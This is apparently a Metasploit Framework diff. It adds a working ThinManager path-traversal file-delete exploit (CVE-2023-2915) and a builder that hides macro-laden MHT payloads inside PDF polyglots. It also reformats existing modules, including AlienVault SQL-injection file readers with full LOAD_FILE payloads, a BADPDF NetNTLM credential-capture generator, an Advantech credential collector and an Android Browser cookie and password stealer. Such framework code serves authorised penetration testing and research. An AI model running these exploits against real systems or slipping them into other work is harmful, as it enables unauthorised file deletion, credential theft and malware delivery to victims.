+  include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Report
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'ThinManager Path Traversal (CVE-2023-2915) Arbitrary File Delete',
+        'Description' => %q{
+          This module exploits a path traversal vulnerability (CVE-2023-2915) in
+          ThinManager <= v13.1.0 to delete arbitrary files from the system.
+          The affected service listens by default on TCP port 2031 and runs in the
+          context of NT AUTHORITY\SYSTEM.
+        },
+        'Author' => [
+          'Michael Heinzl', # MSF Module
+          'Tenable' # Discovery and PoC
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2023-2915'],
+          ['URL', 'https://www.tenable.com/security/research/tra-2023-28'],
+          ['URL', 'https://support.rockwellautomation.com/app/answers/answer_view/a_id/1140471']
+        ],
+        'DisclosureDate' => '2023-08-17',
+        'DefaultOptions' => {
+          'RPORT' => 2031,
+          'SSL' => false
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('FILE', [false, 'The file to delete from the target system.', '/tmp/foo.txt']),
+        OptInt.new('DEPTH', [ true, 'The traversal depth. The FILE path will be prepended with ../ * DEPTH', 7 ])
+      ]
+    )
+  end
+
+  def check
+    begin
+      connect
+    rescue Rex::ConnectionTimeout
+      print_error("Connection to #{datastore['RHOSTS']}:#{datastore['RPORT']} failed.")
+      return Exploit::CheckCode::Unknown
+    end
+
+    vprint_status('Sending handshake...')
+    handshake = [0x100].pack('V')
+    vprint_status(Rex::Text.to_hex_dump(handshake))
+    sock.put(handshake)
+
+    res = sock.get_once(4096, 5)
+    expected_header = "\x00\x04\x00\x01\x00\x00\x00\x08".b
+
+    if res&.start_with?(expected_header)
+      vprint_status('Received handshake response.')
+      vprint_status(Rex::Text.to_hex_dump(res))
+      disconnect
+      return Exploit::CheckCode::Detected
+    elsif res
+      vprint_status('Received unexpected handshake response:')
+      vprint_status(Rex::Text.to_hex_dump(res))
+      disconnect
+      return Exploit::CheckCode::Safe
+    else
+      disconnect
+      return Exploit::CheckCode::Unknown('No handshake response received.')
+    end
+  end
+
+  def mk_msg(msg_type, flags, data)
+    dlen = data.length
+    hdr = [msg_type, flags, dlen].pack('nnN')
+    hdr + data
+  end
+
+  def run
+    print_status('Sending handshake...')
+
+    begin
+      connect
+    rescue Rex::ConnectionTimeout => e
+      fail_with(Failure::Unreachable, "Connection to #{datastore['RHOSTS']}:#{datastore['RPORT']} failed: #{e.message}")
+    end
+
+    handshake = [0x100].pack('V')
+    vprint_status(Rex::Text.to_hex_dump(handshake))
+
+    begin
+      sock.put(handshake)
+    rescue StandardError => e
+      fail_with(Failure::UnexpectedReply, "Failed during handshake send: #{e.class} - #{e.message}")
+    end
+
+    res = sock.get
+    if res
+      print_status('Received handshake response.')
+      vprint_status(Rex::Text.to_hex_dump(res))
+    else
+      print_error('No handshake response received.')
+      fail_with(Failure::Unreachable, "Connection to #{datastore['RHOSTS']}:#{datastore['RPORT']} failed.")
+    end
+
+    begin
+      fname = datastore['FILE']
+      traversal = '../' * 7
+      full_fname = traversal + fname
+      full_fname = full_fname.gsub(%r{/+}, '/')
+
+      data = [0xaa].pack('N')
+      data << "unk_str1\x00"
+      data << [1].pack('N')
+      data << full_fname.encode('ASCII') + "\x00"
+
+      req = mk_msg(21, 0x0021, data)
+    rescue StandardError => e
+      fail_with(Failure::BadConfig, "Failed to construct request: #{e.class} - #{e.message}")
+    end
+
+    vprint_status(Rex::Text.to_hex_dump(req))
+
+    print_status("Deleting #{fname} from #{datastore['RHOSTS']}")
+    sock.put(req)
+
+    begin
+      res = sock.get
+      if res
+        print_good('Received response from target.')
+        vprint_status(Rex::Text.to_hex_dump(res)) if res
+      else
+        print_error('No response received from target.')
+      end
+    rescue StandardError => e
+      fail_with(Failure::TimeoutExpired, "Failed to receive response: #{e.class} - #{e.message}")
+    ensure
+      disconnect
+    end
+  end
+end
@@ -14,9 +14,10 @@ class MetasploitModule < Msf::Auxiliary
        info,
        'Name' => 'ThinManager Path Traversal (CVE-2023-27855) Arbitrary File Upload',
        'Description' => %q{
-          This module exploits a path traversal vulnerability (CVE-2023-27855 ) in ThinManager <= v13.0.1 to upload arbitrary files to the target system.
-
-          The affected service listens by default on TCP port 2031 and runs in the context of NT AUTHORITY\SYSTEM.
+          This module exploits a path traversal vulnerability (CVE-2023-27855) in
+          ThinManager <= v13.0.1 to upload arbitrary files to the target system.
+          The affected service listens by default on TCP port 2031 and runs in the
+          context of NT AUTHORITY\SYSTEM.
        },
        'Author' => [
          'Michael Heinzl', # MSF Module
@@ -24,14 +25,14 @@ class MetasploitModule < Msf::Auxiliary
        ],
        'License' => MSF_LICENSE,
        'References' => [
-          ['CVE', '2023-27855 '],
+          ['CVE', '2023-27855'],
          ['URL', 'https://www.tenable.com/security/research/tra-2023-13'],
          ['URL', 'https://rockwellautomation.custhelp.com/app/answers/answer_view/a_id/1138640']
        ],
        'DisclosureDate' => '2023-04-05',
        'DefaultOptions' => {
          'RPORT' => 2031,
-          'SSL' => 'False'
+          'SSL' => false
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
@@ -14,9 +14,10 @@ class MetasploitModule < Msf::Auxiliary
        info,
        'Name' => 'ThinManager Path Traversal (CVE-2023-2917) Arbitrary File Upload',
        'Description' => %q{
-          This module exploits a path traversal vulnerability (CVE-2023-2917) in ThinManager <= v13.1.0 to upload arbitrary files to the target system.
-
-          The affected service listens by default on TCP port 2031 and runs in the context of NT AUTHORITY\SYSTEM.
+          This module exploits a path traversal vulnerability (CVE-2023-2917) in
+          ThinManager <= v13.1.0 to upload arbitrary files to the target system.
+          The affected service listens by default on TCP port 2031 and runs in the
+          context of NT AUTHORITY\SYSTEM.
        },
        'Author' => [
          'Michael Heinzl', # MSF Module
@@ -24,14 +25,14 @@ class MetasploitModule < Msf::Auxiliary
        ],
        'License' => MSF_LICENSE,
        'References' => [
-          ['CVE', '2023-2917 '],
+          ['CVE', '2023-2917'],
          ['URL', 'https://www.tenable.com/security/research/tra-2023-28'],
          ['URL', 'https://support.rockwellautomation.com/app/answers/answer_view/a_id/1140471']
        ],
        'DisclosureDate' => '2023-08-17',
        'DefaultOptions' => {
          'RPORT' => 2031,
-          'SSL' => 'False'
+          'SSL' => false
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
@@ -71,7 +71,7 @@ class MetasploitModule < Msf::Auxiliary
    ver.each do |v|
      print_status("\t#{v.chomp}")
      report_ora_enum_note(
-        { :component_version => v.chomp },
+        { :component_version => v.chomp }
      )
    end

@@ -85,24 +85,24 @@ class MetasploitModule < Msf::Auxiliary
      if vparm['audit_trail'] == 'NONE'
        print_status("\tDatabase Auditing is not enabled!")
        report_ora_enum_note(
-          { :audit_trail => 'Disabled' },
+          { :audit_trail => 'Disabled' }
        )
      else
        print_status("\tDatabase Auditing is enabled!")
        report_ora_enum_note(
-          { :audit_trail => 'Enabled' },
+          { :audit_trail => 'Enabled' }
        )
      end

      if vparm['audit_sys_operations'] == 'FALSE'
        print_status("\tAuditing of SYS Operations is not enabled!")
        report_ora_enum_note(
-          { :audit_sys_ops => 'Disabled' },
+          { :audit_sys_ops => 'Disabled' }
        )
      else
        print_status("\tAuditing of SYS Operations is enabled!")
        report_ora_enum_note(
-          { :audit_sys_ops => 'Enabled' },
+          { :audit_sys_ops => 'Enabled' }
        )
      end
    end
@@ -22,7 +22,7 @@ class MetasploitModule < Msf::Auxiliary
        'DisclosureDate' => '2025-02-13',
        'DefaultOptions' => {
          'RPORT' => 34022,
-          'SSL' => 'False'
+          'SSL' => false
        },
        'Platform' => 'win',
        'Arch' => [ ARCH_CMD ],
@@ -111,7 +111,7 @@ class MetasploitModule < Msf::Auxiliary
    report_note(
      :rhost => datastore['RHOSTS'],
      :rport => datastore['RPORT'],
-      :type  => "psexec_command",
+      :type => "psexec_command",
      :name => datastore['COMMAND'],
      :data => { :command_output => output }
    )
@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Auxiliary
    #  host: inst.private_ip_address,
    #  type: 'ec2.public_ips',
    #  data: { :eips => eips.join(' ') }
-    #) unless eips.empty?
+    # ) unless eips.empty?
    if inst.public_ip_address && !inst.public_dns_name.empty?
      report_note(
        host: inst.private_ip_address,
@@ -84,10 +84,10 @@ class MetasploitModule < Msf::Auxiliary
      print_status("Found Byte-Range Header DOS at #{uri}")

      report_note(
-        :host   => rhost,
-        :port   => rport,
-        :type   => 'apache.killer',
-        :data   => { :uri => uri }
+        :host => rhost,
+        :port => rport,
+        :type => 'apache.killer',
+        :data => { :uri => uri }
      )

    else
@@ -7,27 +7,33 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
-    super(update_info(info,
-        'Name'          => 'BADPDF Malicious PDF Creator',
-        'Description'   => '
+    super(
+      update_info(
+        info,
+        'Name' => 'BADPDF Malicious PDF Creator',
+        'Description' => %q{
          This module can either creates a blank PDF file which contains a UNC link which can be used
          to capture NetNTLM credentials, or if the PDFINJECT option is used it will inject the necessary
          code into an existing PDF document if possible.
-        ',
-        'License'       => MSF_LICENSE,
-        'Author'        =>
-            [
-              'Assaf Baharav',    # Code provided as POC by CheckPoint
-              'Yaron Fruchtmann', # Code provided as POC by CheckPoint
-              'Ido Solomon',      # Code provided as POC by CheckPoint
-              'Richard Davy - secureyourit.co.uk', # Metasploit
-            ],
-        'Platform'      => ['win'],
-        'References'    =>
-        [
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Assaf Baharav', # Code provided as POC by CheckPoint
+          'Yaron Fruchtmann', # Code provided as POC by CheckPoint
+          'Ido Solomon',      # Code provided as POC by CheckPoint
+          'Richard Davy - secureyourit.co.uk', # Metasploit
+        ],
+        'Platform' => ['win'],
+        'References' => [
          ['CVE', '2018-4993'],
          ['URL', 'https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/']
-        ])
+        ],
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
      )
    register_options(
      [
@@ -0,0 +1,216 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Maldoc in PDF Polyglot converter',
+        'Description' => %q{
+          A malicious MHT file created can be opened in Microsoft Word even though it has magic numbers and file
+          structure of PDF.
+
+          If the file has configured macro, by opening it in Microsoft Word, VBS runs and performs malicious behaviors.
+
+          The attack does not bypass configured macro locks. And the malicious macros are also not executed when the
+          file is opened in PDF readers or similar software.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'mekhalleh (RAMELLA Sebastien)' # module author powered by EXA Reunion (https://www.exa.re/)
+        ],
+        'Platform' => ['win'],
+        'References' => [
+          ['URL', 'https://blogs.jpcert.or.jp/en/2023/08/maldocinpdf.html'],
+          ['URL', 'https://socradar.io/maldoc-in-pdf-a-novel-method-to-distribute-malicious-macros/'],
+          ['URL', 'https://www.nospamproxy.de/en/maldoc-in-pdf-danger-from-word-files-hidden-in-pdfs/'],
+          ['URL', 'https://github.com/exa-offsec/maldoc_in_pdf_polyglot/tree/main/demo']
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptPath.new('FILENAME', [true, 'The input MHT filename with macro embedded']),
+        OptPath.new('INJECTED_PDF', [false, 'The input PDF filename to inject in (optional)']),
+        OptString.new('MESSAGE_PDF', [false, 'The message to display in the local PDF template (if INJECTED_PDF is NOT used)', 'You must open this document in Microsoft Word']),
+        OptEnum.new('OUTPUT_EXT', [true, 'The output file extension', '.doc', ['.doc', '.rtf']])
+      ]
+    )
+  end
+
+  def create_pdf(mht)
+    pdf = ''
+    pdf << "#{rand_pdfheader}\r\n"
+
+    # item 1 (catalog)
+    pdf << "1 0 obj\r\n"
+    pdf << "<< /Type /Catalog /Pages 2 0 R >>\r\n"
+    pdf << "endobj\r\n"
+
+    # item 2 (pages)
+    pdf << "2 0 obj\r\n"
+    pdf << "<< /Type /Pages /Kids [3 0 R] /Count 1 >>\r\n"
+    pdf << "endobj\r\n"
+
+    # item 3 (page with resources)
+    pdf << "3 0 obj\r\n"
+    pdf << "<< /Type /Page /Parent 2 0 R /Resources << /Font << /F1 5 0 R >> >> /MediaBox [0 0 612 792] /Contents 4 0 R >>\r\n"
+    pdf << "endobj\r\n"
+
+    # item 4 (content)
+    content = "BT /F1 12 Tf 100 700 Td (#{datastore['MESSAGE_PDF']}) Tj ET\r\n"
+    pdf << "4 0 obj\r\n"
+    # exact stream length
+    pdf << "<< /Length #{content.length} >>\r\n"
+    pdf << "stream\r\n"
+    pdf << content
+    pdf << "endstream\r\n"
+    pdf << "endobj\r\n"
+
+    # item 5 (helvetica font)
+    pdf << "5 0 obj\r\n"
+    pdf << "<< /Type /Font /Subtype /Type1 /BaseFont /Helvetica >>\r\n"
+    pdf << "endobj\r\n"
+
+    # item 6 (MHT content)
+    pdf << "6 0 obj\r\n"
+    pdf << "<< /Length #{mht.length} >>\r\n"
+    pdf << "stream\r\n"
+    pdf << mht
+    pdf << "\r\nendstream\r\n"
+    pdf << "endobj\r\n"
+
+    # calculation of dynamic offsets
+    offsets = []
+    offsets << 0
+    for i in 1..6 do
+      offsets << pdf.index("#{i} 0 obj")
+    end
+
+    # XREF section
+    xref_start = pdf.length
+    pdf << "xref\r\n"
+    # update for 7 objects (0-6)
+    pdf << "0 7\r\n"
+    pdf << "0000000000 65535 f\r\n"
+    offsets[1..].each do |offset|
+      pdf << format("%010d 00000 n\r\n", offset)
+    end
+
+    # trailer
+    pdf << "trailer\r\n"
+    # update for 7 objects (0-6)
+    pdf << "<< /Size 7 /Root 1 0 R >>\r\n"
+    pdf << "startxref\r\n"
+    pdf << "#{xref_start}\r\n"
+    pdf << "%%EOF\r\n"
+
+    # saving the file
+    ltype = "auxiliary.fileformat.#{shortname}"
+    fname = File.basename(datastore['FILENAME'], '*') + datastore['OUTPUT_EXT']
+    path = store_local(ltype, nil, pdf, fname)
+
+    print_good("The file '#{fname}' is stored at '#{path}'")
+  end
+
+  def inject_pdf(pdf_path, mht)
+    # read PDF in binary mode
+    pdf_data = File.binread(pdf_path)
+    vprint_status("PDF data length: #{pdf_data.length}")
+
+    # find the position of 'startxref'
+    startxref_index = pdf_data.rindex('startxref')
+    unless startxref_index
+      fail_with(Failure::Unknown, 'Invalid PDF: \'startxref\' not found')
+    end
+
+    xref_start_value = pdf_data[startxref_index..].match(/startxref\r?\n(\d+)/)[1].to_i
+    vprint_status("PDF startxref value: #{xref_start_value}")
+    vprint_status("PDF startxref position: #{startxref_index}")
+
+    # extract the original objects
+    original_objects = pdf_data[0...startxref_index]
+
+    # build the MHT object as the first object (0 0 obj)
+    mht_object = ''
+    mht_object << "0 0 obj\r\n"
+    mht_object << "<< /Length #{mht.length} >>\r\n"
+    mht_object << "stream\r\n"
+    mht_object << mht
+    mht_object << "\r\nendstream\r\n"
+    mht_object << "endobj\r\n"
+
+    # combine: MHT first, then original items
+    updated_objects = mht_object + original_objects
+
+    # calculate offsets for XREF section
+    offsets = []
+    updated_objects.scan(/(\d+) 0 obj/) do |match|
+      offsets << updated_objects.index("#{match[0]} 0 obj")
+    end
+
+    # build the XREF section
+    xref = "xref\r\n"
+    # includes free entry (0) and items
+    xref << "0 #{offsets.size + 1}\r\n"
+    # free entry
+    xref << "0000000000 65535 f\r\n"
+    offsets.each do |offset|
+      xref << format("%010d 00000 n\r\n", offset)
+    end
+
+    # build the trailer
+    xref_start_new = updated_objects.length
+    trailer = "trailer\r\n"
+    trailer << "<< /Size #{offsets.size + 1} /Root 1 0 R >>\r\n"
+    trailer << "startxref\r\n"
+    trailer << "#{xref_start_new}\r\n"
+    trailer << "%%EOF\r\n"
+
+    # assemble the final PDF
+    headers = "#{rand_pdfheader}\r\n"
+    pdf = headers + updated_objects + xref + trailer
+
+    # saving the file
+    ltype = "auxiliary.fileformat.#{shortname}"
+    fname = File.basename(datastore['FILENAME'], '*') + datastore['OUTPUT_EXT']
+    path = store_local(ltype, nil, pdf, fname)
+
+    print_good("The file '#{fname}' is stored at '#{path}'")
+  end
+
+  def rand_pdfheader
+    selected_version = ['1.0', '1.1', '1.2', '1.3', '1.4', '1.5', '1.6', '1.7', '2.0'].sample
+
+    "%PDF-#{selected_version}"
+  end
+
+  def run
+    content = File.read(datastore['FILENAME'])
+    fail_with(Failure::BadConfig, 'The MHT file content is empty') if content&.empty?
+
+    # if no pdf injected is provided, create new PDF from template
+    if datastore['INJECTED_PDF'].blank?
+      print_status('INJECTED_PDF not provided, creating the PDF from scratch')
+      fail_with(Failure::BadConfig, 'No MESSAGE_PDF provided') if datastore['MESSAGE_PDF'].blank?
+
+      create_pdf(content)
+    else
+      print_status("PDF creation using '#{File.basename(datastore['INJECTED_PDF'])}' as template")
+
+      inject_pdf(datastore['INJECTED_PDF'], content)
+    end
+  end
+
+end
@@ -6,35 +6,42 @@
 class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "Advantech WebAccess 8.1 Post Authentication Credential Collector",
-      'Description'    => %q{
-        This module allows you to log into Advantech WebAccess 8.1, and collect all of the credentials.
-        Although authentication is required, any level of user permission can exploit this vulnerability.
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => "Advantech WebAccess 8.1 Post Authentication Credential Collector",
+        'Description' => %q{
+          This module allows you to log into Advantech WebAccess 8.1, and collect all of the credentials.
+          Although authentication is required, any level of user permission can exploit this vulnerability.

-        Note that 8.2 is not suitable for this.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+          Note that 8.2 is not suitable for this.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
          'h00die', # Pointed out the obvious during a PR review for CVE-2017-5154
          'sinn3r', # Metasploit module
        ],
-      'References'     =>
-        [
+        'References' => [
          ['CVE', '2016-5810'],
          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/7859#issuecomment-274305229']
        ],
-      'DisclosureDate' => '2017-01-21'
-    ))
+        'DisclosureDate' => '2017-01-21',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
        OptString.new('WEBACCESSUSER', [true, 'Username for Advantech WebAccess', 'admin']),
        OptString.new('WEBACCESSPASS', [false, 'Password for Advantech WebAccess', '']),
        OptString.new('TARGETURI', [true, 'The base path to Advantech WebAccess', '/']),
-      ])
+      ]
+    )
  end

  def do_login
@@ -43,15 +50,15 @@ class MetasploitModule < Msf::Auxiliary
    uri = normalize_uri(target_uri.path, 'broadweb', 'user', 'signin.asp')

    res = send_request_cgi({
-      'method'    => 'POST',
-      'uri'       => uri,
+      'method' => 'POST',
+      'uri' => uri,
      'vars_post' => {
        'page' => '/',
-        'pos'  => '',
+        'pos' => '',
        'username' => datastore['WEBACCESSUSER'],
        'password' => datastore['WEBACCESSPASS'],
-        'remMe'    => '',
-        'submit1'  => 'Login'
+        'remMe' => '',
+        'submit1' => 'Login'
      }
    })

@@ -77,11 +84,11 @@ class MetasploitModule < Msf::Auxiliary
  def get_user_cred_detail(sid, user)
    vprint_status("Gathering password for user: #{user}")

-    uri = normalize_uri(target_uri.path, 'broadWeb','user', 'upAdminPg.asp')
+    uri = normalize_uri(target_uri.path, 'broadWeb', 'user', 'upAdminPg.asp')

    res = send_request_cgi({
      'method' => 'GET',
-      'uri'    => uri,
+      'uri' => uri,
      'cookie' => sid,
      'vars_get' => {
        'uname' => user
@@ -106,7 +113,7 @@ class MetasploitModule < Msf::Auxiliary

    res = send_request_cgi({
      'method' => 'GET',
-      'uri'    => uri,
+      'uri' => uri,
      'cookie' => sid
    })

@@ -6,45 +6,50 @@
 class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "AlienVault Authenticated SQL Injection Arbitrary File Read",
-      'Description'    => %q{
-        AlienVault 4.5.0 is susceptible to an authenticated SQL injection attack via a PNG
-        generation PHP file. This module exploits this to read an arbitrary file from
-        the file system. Any authenticated user is able to exploit it, as administrator
-        privileges aren't required.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-          'Brandon Perry <bperry.volatile[at]gmail.com>' #meatpistol module
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => "AlienVault Authenticated SQL Injection Arbitrary File Read",
+        'Description' => %q{
+          AlienVault 4.5.0 is susceptible to an authenticated SQL injection attack via a PNG
+          generation PHP file. This module exploits this to read an arbitrary file from
+          the file system. Any authenticated user is able to exploit it, as administrator
+          privileges aren't required.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Brandon Perry <bperry.volatile[at]gmail.com>' # meatpistol module
        ],
-      'References'     =>
-        [
+        'References' => [
          ['EDB', '32644']
        ],
-      'DefaultOptions'  =>
-        {
+        'DefaultOptions' => {
          'SSL' => true
        },
-      'Platform'       => ['linux'],
-      'Privileged'     => false,
-      'DisclosureDate' => '2014-03-30'))
+        'Platform' => ['linux'],
+        'Privileged' => false,
+        'DisclosureDate' => '2014-03-30',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

-      register_options(
+    register_options(
      [
        Opt::RPORT(443),
        OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd' ]),
        OptString.new('USERNAME', [ true, 'Single username' ]),
        OptString.new('PASSWORD', [ true, 'Single password' ]),
        OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/' ])
-      ])
-
+      ]
+    )
  end

  def run
-
    print_status("Get a valid session cookie...")
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php')
@@ -113,7 +118,7 @@ class MetasploitModule < Msf::Auxiliary
      full << str
      vprint_status(str)

-      i = i+1
+      i = i + 1
    end

    path = store_loot('alienvault.file', 'text/plain', datastore['RHOST'], full, datastore['FILEPATH'])
@@ -121,9 +126,9 @@ class MetasploitModule < Msf::Auxiliary
  end

  def sqli(left_marker, right_marker, i, cookie, filename)
-    pay =  "2014-02-28' AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},"
+    pay = "2014-02-28' AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},"
    pay << "(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x#{filename})) AS CHAR),"
-    pay << "0x20)),#{(50*i)+1},50)),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
+    pay << "0x20)),#{(50 * i) + 1},50)),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
    pay << " GROUP BY x)a) AND 'xnDa'='xnDa"

    get = {
@@ -145,4 +150,3 @@ class MetasploitModule < Msf::Auxiliary
    end
  end
 end
-
@@ -6,46 +6,51 @@
 class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "AlienVault Authenticated SQL Injection Arbitrary File Read",
-      'Description'    => %q{
-        AlienVault 4.6.1 and below is susceptible to an authenticated SQL injection attack against
-        newpolicyform.php, using the 'insertinto' parameter. This module exploits the vulnerability
-        to read an arbitrary file from the file system. Any authenticated user is able to exploit
-        this, as administrator privileges are not required.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => "AlienVault Authenticated SQL Injection Arbitrary File Read",
+        'Description' => %q{
+          AlienVault 4.6.1 and below is susceptible to an authenticated SQL injection attack against
+          newpolicyform.php, using the 'insertinto' parameter. This module exploits the vulnerability
+          to read an arbitrary file from the file system. Any authenticated user is able to exploit
+          this, as administrator privileges are not required.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
          'Chris Hebert <chrisdhebert[at]gmail.com>'
        ],
-      'References'     =>
-        [
+        'References' => [
          ['CVE', '2014-5383'],
          ['OSVDB', '106815'],
          ['EDB', '33317'],
          ['URL', 'http://forums.alienvault.com/discussion/2690/security-advisories-v4-6-1-and-lower']
        ],
-      'DefaultOptions'  =>
-        {
+        'DefaultOptions' => {
          'SSL' => true
        },
-      'Privileged'     => false,
-      'DisclosureDate' => '2014-05-09'))
+        'Privileged' => false,
+        'DisclosureDate' => '2014-05-09',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

-      register_options([
-        Opt::RPORT(443),
-        OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd' ]),
-        OptString.new('USERNAME', [ true, 'Single username' ]),
-        OptString.new('PASSWORD', [ true, 'Single password' ]),
-        OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/' ]),
-        OptInt.new('SQLI_TIMEOUT', [ true, 'Specify the maximum time to exploit the sqli (in seconds)', 60])
-      ])
+    register_options([
+      Opt::RPORT(443),
+      OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd' ]),
+      OptString.new('USERNAME', [ true, 'Single username' ]),
+      OptString.new('PASSWORD', [ true, 'Single password' ]),
+      OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/' ]),
+      OptInt.new('SQLI_TIMEOUT', [ true, 'Specify the maximum time to exploit the sqli (in seconds)', 60])
+    ])
  end

  def run
-
    print_status("Get a valid session cookie...")
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php')
@@ -117,7 +122,7 @@ class MetasploitModule < Msf::Auxiliary
          full << str
          vprint_status(str)

-          i = i+1
+          i = i + 1
        end
      end
    rescue ::Timeout::Error
@@ -134,9 +139,9 @@ class MetasploitModule < Msf::Auxiliary
  end

  def sqli(left_marker, right_marker, sql_true, i, cookie, filename)
-    pay =  "X') AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},"
+    pay = "X') AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},"
    pay << "(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x#{filename})) AS CHAR),"
-    pay << "0x20)),#{(50*i)+1},50)),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
+    pay << "0x20)),#{(50 * i) + 1},50)),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
    pay << " GROUP BY x)a) AND ('0x#{sql_true.unpack("H*")[0]}'='0x#{sql_true.unpack("H*")[0]}"

    get = {
@@ -3,36 +3,42 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

-
 class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Auxiliary::Report
  include Msf::Exploit::JSObfu

-  def initialize(info={})
-    super(update_info(info,
-      'Name'        => 'Android Browser File Theft',
-      'Description' => %q{
-        This module steals the cookie, password, and autofill databases from the
-        Browser application on AOSP 4.3 and below.
-      },
-      'Author'         => [
-        'Rafay Baloch', # Found UXSS bug in Android Browser
-        'joev'          # File redirect and msf module
-      ],
-      'License'     => MSF_LICENSE,
-      'Actions'        => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
-      'PassiveActions' => [ 'WebServer' ],
-      'References' =>
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Android Browser File Theft',
+        'Description' => %q{
+          This module steals the cookie, password, and autofill databases from the
+          Browser application on AOSP 4.3 and below.
+        },
+        'Author' => [
+          'Rafay Baloch', # Found UXSS bug in Android Browser
+          'joev'          # File redirect and msf module
+        ],
+        'License' => MSF_LICENSE,
+        'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
+        'PassiveActions' => [ 'WebServer' ],
+        'References' => [
          # patch for file redirection, 2014
          ['URL', 'https://android.googlesource.com/platform/packages/apps/Browser/+/d2391b492dec778452238bc6d9d549d56d41c107%5E%21/#F0'],
          ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=90222'] # the UXSS
        ],
-      'DefaultAction'  => 'WebServer'
-    ))
+        'DefaultAction' => 'WebServer',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

-     register_options([
+    register_options([
      OptString.new('ADDITIONAL_FILES', [
        false,
        'Comma-separated list of addition file URLs to steal.',
@@ -63,7 +69,7 @@ class MetasploitModule < Msf::Auxiliary
    data = JSON.parse(request.body)
    contents = hex2bin(data['data'])
    file = File.basename(data['url'])
